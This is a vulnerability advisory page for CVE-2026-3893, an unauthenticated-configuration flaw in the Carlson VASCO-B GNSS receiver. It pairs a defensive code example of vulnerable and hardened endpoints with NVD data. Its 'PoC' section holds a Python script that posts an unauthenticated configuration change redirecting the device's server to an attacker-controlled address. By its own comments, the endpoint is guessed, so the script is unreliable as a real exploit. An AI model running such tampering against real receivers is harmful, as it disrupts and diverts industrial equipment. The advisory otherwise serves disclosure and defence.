Security Vulnerability Report
CVE-2026-3893 CVSS 9.4 CRITICAL

Published: 2026-04-28 19:37:40
Last Modified: 2026-04-28 20:10:23

Description

The Carlson VASCO-B GNSS Receiver lacks an authentication mechanism, allowing an attacker with network access to directly access and modify its configuration and operational functions without needing credentials.

Weakness: CWE-306 (Missing Authentication for Critical Function), as assigned in the NVD record below.
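The pattern behind CWE-306, shown as an added example that is not Carlson's firmware or API: a WSGI configuration endpoint that applies changes for any caller that can reach the port, beside a hardened version that authenticates before routing (deny by default) and compares the token in constant time. The path /api/config/update, the Bearer-token scheme, the configuration keys and the in-process `call` driver are all assumptions made for illustration.

```python
"""Missing authentication on a configuration endpoint (CWE-306) and the
hardened equivalent. Added illustration; not the vendor's firmware or API.
Endpoint path, token header and config keys are assumptions."""
import hmac
import json
import secrets
from io import BytesIO
from wsgiref.util import setup_testing_defaults

# Hypothetical device state; a real receiver keeps this in non-volatile storage.
DEVICE_CONFIG = {"network_setting": "static", "server_ip": "10.0.0.5"}

# Hypothetical management token, provisioned out of band (never a vendor default).
ADMIN_TOKEN = secrets.token_hex(16)


def _read_json(environ):
    length = int(environ.get("CONTENT_LENGTH") or 0)
    return json.loads(environ["wsgi.input"].read(length) or b"{}")


def _respond(start_response, status, body, extra_headers=()):
    payload = json.dumps(body).encode()
    headers = [("Content-Type", "application/json"),
               ("Content-Length", str(len(payload)))] + list(extra_headers)
    start_response(status, headers)
    return [payload]


def vulnerable_app(environ, start_response):
    """Vulnerable pattern: anyone who can reach the port may rewrite the config."""
    if environ["REQUEST_METHOD"] == "POST" and environ["PATH_INFO"] == "/api/config/update":
        DEVICE_CONFIG.update(_read_json(environ))
        return _respond(start_response, "200 OK", {"ok": True, "config": DEVICE_CONFIG})
    return _respond(start_response, "404 Not Found", {"error": "no such route"})


def _is_authenticated(environ):
    """Bearer-token check. Compare as bytes with compare_digest: it is constant
    time, and the bytes form avoids the TypeError str comparison raises on
    non-ASCII attacker input."""
    scheme, _, token = environ.get("HTTP_AUTHORIZATION", "").partition(" ")
    return scheme == "Bearer" and hmac.compare_digest(token.encode(), ADMIN_TOKEN.encode())


def hardened_app(environ, start_response):
    """Hardened pattern: authentication is enforced before routing, so a newly
    added route cannot forget the check (deny by default)."""
    if not _is_authenticated(environ):
        return _respond(start_response, "401 Unauthorized",
                        {"error": "authentication required"},
                        [("WWW-Authenticate", 'Bearer realm="receiver"')])
    if environ["REQUEST_METHOD"] == "POST" and environ["PATH_INFO"] == "/api/config/update":
        DEVICE_CONFIG.update(_read_json(environ))
        return _respond(start_response, "200 OK", {"ok": True, "config": DEVICE_CONFIG})
    return _respond(start_response, "404 Not Found", {"error": "no such route"})


def call(app, method, path, body=None, token=None):
    """Drive a WSGI app in-process (no network) and return (status, parsed body)."""
    environ = {}
    setup_testing_defaults(environ)
    raw = json.dumps(body or {}).encode()
    environ.update({"REQUEST_METHOD": method, "PATH_INFO": path,
                    "CONTENT_LENGTH": str(len(raw)), "wsgi.input": BytesIO(raw)})
    if token is not None:
        environ["HTTP_AUTHORIZATION"] = f"Bearer {token}"
    captured = {}

    def start_response(status, headers):
        captured["status"] = status

    out = b"".join(app(environ, start_response))
    return captured["status"], json.loads(out)


if __name__ == "__main__":
    attack = {"server_ip": "192.168.1.200", "operation_mode": "maintenance"}
    print(call(vulnerable_app, "POST", "/api/config/update", attack))
    print(call(hardened_app, "POST", "/api/config/update", attack))
    print(call(hardened_app, "POST", "/api/config/update", attack, token=ADMIN_TOKEN))
```

The difference between the two handlers is a single check placed before routing; the 401 carries a WWW-Authenticate header so a scanner can tell enforced authentication apart from a missing route.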

CVSS Details

CVSS Score
9.4
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H

Configurations (Affected Products)

No CPE configuration data is available in the NVD record (status: Awaiting Analysis).

Carlson VASCO-B GNSS Receiver (affected firmware versions not specified; refer to the vendor's advisory and CISA advisory ICSA-26-113-02 in the references)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target configuration (example IP address)
target_ip = "192.168.1.100"

# Hypothetical endpoint for configuration update, based on the vulnerability
# description; the real URL, method and parameter names are not published here.
url = f"http://{target_ip}/api/config/update"

# Malicious payload to change device configuration
payload = {
    "network_setting": "dynamic",
    "server_ip": "192.168.1.200",  # redirect data to an attacker-controlled server
    "operation_mode": "maintenance",
}

try:
    # Send the request with no Authorization header (form-encoded body)
    response = requests.post(url, data=payload, timeout=10)
    if response.status_code == 200:
        print("[+] Exploit successful: configuration modified without authentication.")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"[!] Error: {e}")

References

https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-113-02.json (CISA CSAF advisory ICSA-26-113-02)
https://www.carlsonsw.com/support-and-training/ (Carlson support and training)
https://www.cve.org/CVERecord?id=CVE-2026-3893 (CVE record)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3893", "sourceIdentifier": "[email protected]", "published": "2026-04-28T19:37:39.647", "lastModified": "2026-04-28T20:10:23.367", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Carlson VASCO-B GNSS Receiver lacks an authentication mechanism, \nallowing an attacker with network access to directly access and modify \nits configuration and operational functions without needing credentials."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-113-02.json", "source": "[email protected]"}, {"url": "https://www.carlsonsw.com/support-and-training/", "source": "[email protected]"}, {"url": "https://www.cve.org/CVERecord?id=CVE-2026-3893", "source": "[email protected]"}]}}